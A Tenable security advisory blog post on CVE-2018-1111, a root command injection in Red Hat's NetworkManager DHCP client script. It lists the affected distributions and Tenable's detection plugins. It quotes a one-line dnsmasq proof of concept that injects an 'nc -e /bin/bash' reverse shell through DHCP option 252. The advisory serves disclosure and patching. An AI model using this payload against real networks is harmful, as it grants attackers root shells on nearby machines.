Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

Tenable Blog

Subscribe

Advisory: Red Hat DHCP Client Command Injection Trouble

Steve Tilson
Steve Tilson  | Research
May 17, 2018 | 3 Min Read

On May 15, Red Hat disclosed a critical vulnerability in a script included in NetworkManager for the Dynamic Host Configuration Protocol (DHCP) client on Red Hat Enterprise Linux (RHEL). The vulnerability was discovered by Google engineer Felix Wilhelm. The proof of concept for the command injection vulnerability CVE-2018-1111 is so simple that it fits into a single tweet. Wilhelm tweeted: “CVE 2018-1111 is a pretty bad DHCP remote root command injection affecting Red Hat derivates: https://access.redhat.com/security/vulnerabilities/3442151 …. Exploit fits in a tweet so you should patch as soon as possible.”

dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #"

Analysis

DHCP is a protocol used to automatically assign dynamic IP addresses, Domain Name System (DNS) server addresses and other network configuration data to devices. To exploit this vulnerability, an attacker must be on the same network as the vulnerable systems. This is very common when a public Wi-Fi hotspot is offered (e.g., at airports, public libraries or coffee shops).

Red Hat states, “A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol.”

Solution

RHEL Server 6 and 7 are vulnerable. We recommend that all Red Hat customers running affected versions of the dhcplient package urgently apply updates. Other affected Linux distributions include:

  • CentOS 6.x and 7.x
  • Fedora 26, 27 and 28
  • Rawhide

Red Hat's update services for SAP solutions on x86 and IBM Power architectures are also affected.

Other operating systems derived from Fedora/RHEL are likely to be affected, including HPE's ClearOS and Oracle Linux as well as the recently discontinued Korora Linux.

Tenable Research has developed and released the following checks and plugins for this vulnerability.

Plugin ID

Description

109814

CentOS 7 : dhcp (CESA-2018:1453)

109815

CentOS 6 : dhcp (CESA-2018:1454)

109820

Fedora 27 : 12:dhcp (2018-36058ed9f2)

109826

Oracle Linux 7 : dhcp (ELSA-2018-1453)

109827

Oracle Linux 6 : dhcp (ELSA-2018-1454)

109830

OracleVM 3.3 / 3.4 : dhcp (OVMSA-2018-0042)

109839

RHEL 7 : dhcp (RHSA-2018:1453)

109840

RHEL 6 : dhcp (RHSA-2018:1454)

109841

RHEL 7 : dhcp (RHSA-2018:1455)

109842

RHEL 7 : dhcp (RHSA-2018:1456)

109843

RHEL 7 : dhcp (RHSA-2018:1457)

109844

RHEL 6 : dhcp (RHSA-2018:1458)

109845

RHEL 6 : dhcp (RHSA-2018:1459)

109846

RHEL 6 : dhcp (RHSA-2018:1460)

109847

RHEL 6 : dhcp (RHSA-2018:1461)

109849

Scientific Linux Security Update : dhcp on SL6.x i386/x86_64

109850

Scientific Linux Security Update : dhcp on SL7.x x86_64

Additional information

Steve Tilson

Steve Tilson

Steve Tilson is a Rapid Response Manager for Tenable's Research Lab.  Tenable's Research Lab is a comprised of many highly talented engineers leading the Cyber Security Industry and Tenable's Cyber Exposure Process.  Previously working as an Information Security Content Analyst on the SecurityCenter Research Team, he developed Dashboards and Reports for Security Center CV and Tenable's revolutionary Tenable.io Cyber Exposure platform. Before joining Tenable, Steve worked for Accenture as an IT Manager and Network Lead for North America for many years.  As well, Steve has served as Director of Technology for Industrial fabrication and construction firms with multiple sites across the US. He has a extensive background in the architecture, maintenance, and management of large scale domains that include both network connectivity as well as all supporting systems on the local, national, and global scale.  

Related Articles

Foreshadow: Speculative Execution Attack Targets Intel SGX

August 14, 2018

A flaw in Intel’s Software Guard Extensions implementation allows an attacker to access data stored in memory of other applications running on the same host, without the need for privilege escalation....

Ryan Seguin

Ryan Seguin

Advisory: Intel...Simply Misunderstood?

May 11, 2018

To close numerous security gaps, Microsoft, Adobe, Apple, Red Hat, Xen, VMware and other vendors have released a number of patches in the first 10 days of May. We discussed some of these in our recent...

Steve Tilson

Steve Tilson

Microsoft May Madness

May 9, 2018

Patch Tuesday was anything but typical in the month of May. On May 8, Microsoft released security patches for a total of 67 vulnerabilities, addressing 21 critical vulnerabilities, 42 important and fo...

Josef Weiss

Josef Weiss

Cybersecurity Snapshot: Strengthen Identity and Access Management Security with New CISA/NSA Best Practices

March 24, 2023

Learn about a new guide packed with best practices recommendations to improve IAM systems security. Plus, cybersecurity ranks as top criteria for software buyers. Also, guess who’s also worried about ChatGPT? Oh, and do you know what a BISO is? And much more! 

Juan Perez

Juan Perez

Tenable Cyber Watch: A Look at the U.S. National Cybersecurity Strategy, A Powerful AI Tech Gears Up for Prime Time, and more

March 20, 2023

This week’s edition of the Tenable Cyber Watch unpacks the White House’s National Cybersecurity Strategy and explores how artificial intelligence will help cyber teams with complex attacks. Also covered: Why software vendors should prepare to submit letters of attestation to the GSA.

Jirah Mickle

Jirah Mickle

OpenAI’s ChatGPT and GPT-4 Used as Lure in Phishing Email, Twitter Scams to Promote Fake OpenAI Tokens

March 17, 2023

Hoping to cash in on the massive interest around OpenAI’s GPT-4 – ChatGPT’s new multimodal model – scammers have launched phishing campaigns via email and Twitter designed to steal cryptocurrency. Check out how they’re carrying out the scams and how you can avoid becoming a victim.

Satnam Narang

Satnam Narang

  • Plugins

Are You Vulnerable to the Latest Exploits?

Enter your email to receive the latest cyber exposure alerts in your inbox.

Try for Free Buy Now
tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable.io Vulnerability Management trial also includes Tenable Lumin, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

tenable.io BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

65 assets

Choose Your Subscription Option:

Buy Now
Try for Free Buy Now

Try Nessus Professional Free

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today.

NEW - Nessus Expert Now Available

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. Click here to Try Nessus Expert.

Fill out the form below to continue with a Nessus Professional Trial.

Buy Nessus Professional

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Select Your License

Buy a multi-year license and save.

Add Support and Training

Buy Now
Renew an existing license | Find a reseller | Request a Quote
Try for Free Buy Now
Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable.io Vulnerability Management trial also includes Tenable Lumin, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

Tenable.io BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

65 assets

Choose Your Subscription Option:

Buy Now
Try for Free Buy Now

Try Tenable.io Web Application Scanning

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable.io platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Your Tenable Web Application Scanning trial also includes Tenable.io Vulnerability Management, Tenable Lumin and Tenable.cs Cloud Security.

Buy Tenable.io Web Application Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try for Free Contact Sales

Try Tenable.io Container Security

Enjoy full access to the only container security offering integrated into a vulnerability management platform. Monitor container images for vulnerabilities, malware and policy violations. Integrate with continuous integration and continuous deployment (CI/CD) systems to support DevOps practices, strengthen security and support enterprise policy compliance.

Buy Tenable.io Container Security

Tenable.io Container Security seamlessly and securely enables DevOps processes by providing visibility into the security of container images – including vulnerabilities, malware and policy violations – through integration with the build process.

Try for Free Contact Sales

Try Tenable Lumin

Visualize and explore your Cyber Exposure, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable.io Vulnerability Management, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

Buy Tenable Lumin

Contact a Sales Representative to see how Lumin can help you gain insight across your entire organization and manage cyber risk.

Try for Free Contact Sales

Try Tenable.cs

Enjoy full access to detect and fix cloud infrastructure misconfigurations and view runtime vulnerabilities. Sign up for your free trial now. To learn more about the trial process click here.

Your Tenable.cs Cloud Security trial also includes Tenable.io Vulnerability Management, Tenable Lumin and Tenable.io Web Application Scanning.

Contact a Sales Rep to Buy Tenable.cs

Contact a Sales Representative to learn more about Tenable.cs Cloud Security and see how easy it is to onboard your cloud accounts and get visibility into both cloud misconfigurations and vulnerabilities within minutes.

Try for Free Buy Now

Try Nessus Expert Free

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Already have Nessus Professional?
Upgrade to Nessus Expert free for 7 days.

Buy Nessus Expert

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Select Your License

Buy a multi-year license and save more.

Add Support and Training

Buy Now
Renew an existing license | Find a reseller | Request a quote